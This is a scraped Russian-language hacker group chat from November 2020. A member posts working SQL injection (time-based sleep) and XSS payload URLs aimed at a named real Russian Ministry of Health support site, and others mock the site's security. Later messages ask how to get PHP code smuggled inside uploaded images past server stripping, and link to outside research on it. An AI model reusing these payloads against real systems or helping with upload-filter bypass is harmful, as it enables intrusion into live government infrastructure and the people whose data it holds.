.-
Горсвет ток
https://support.egisz.rosminzdrav.ru/index.php?/News/List/Index/0/6&date=&query=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z#SQLi
Size: a a a
2020 November 21
Z
МИНЗДРАВ, ПРОСТИ ПРОСТИ ПРОСТИ !!!
#SQLi
#SQLi
Z
https://support.egisz.rosminzdrav.ru/index.php?/News/List/Index/0/6&date=&query=%27%22%20onmouseover%3dalert(%22t.me/bgener%22)%20#XSS
.-
Кому щас до этого...
Z
испанский стыд
GM
испанский стыд
Никакого стыда, только спокойствие
GM
PM
https://support.egisz.rosminzdrav.ru/index.php?/News/List/Index/0/6&date=&query=%27%22%20onmouseover%3dalert(%22t.me/bgener%22)%20#XSS
а в чём тут проблема, подскажите, пожалуйста
Z
а в чём тут проблема, подскажите, пожалуйста
в иньекции sql запроса в бд через веб-приложение
T
. -
Кому щас до этого...
реально. здравозахоронению точно не до сайтов
Z
реально. здравозахоронению точно не до сайтов
ага) а до короны было безопасно))
Д
ага) а до короны было безопасно))
Ну пару поликлиник вылечили 👍
2020 November 22
LE
Если в сессиях одна сессия где написано твое устройство, можно ли 100% сказать что аккаунтом владеешь только ты
⠀⠀
Кто съедает php код при загрузке его через картинку ? 🤨
⠀⠀
Весь код в артефакты превращается
⠀⠀
S
⠀ ⠀ ⠀ ⠀
Кто съедает php код при загрузке его через картинку ? 🤨
Операторы обязаны хранить передаваемые данные. Чтобы на всякий случай избежать выполнения кода, этот самый код вырезают, в том числе и с картинок :)
⠀⠀
Операторы обязаны хранить передаваемые данные. Чтобы на всякий случай избежать выполнения кода, этот самый код вырезают, в том числе и с картинок :)
Какие операторы ? Как называется этот оператор ? Его можно обойти или отключить как то ?
S
Ты серьезно? Я ж прикалываюсь ))) небось просто перекодирует сервер при приеме.
q
⠀ ⠀ ⠀ ⠀
Кто съедает php код при загрузке его через картинку ? 🤨
есть много ресерчей на эту тему. из того что вспомнил https://rdot.org/forum/showthread.php?t=2780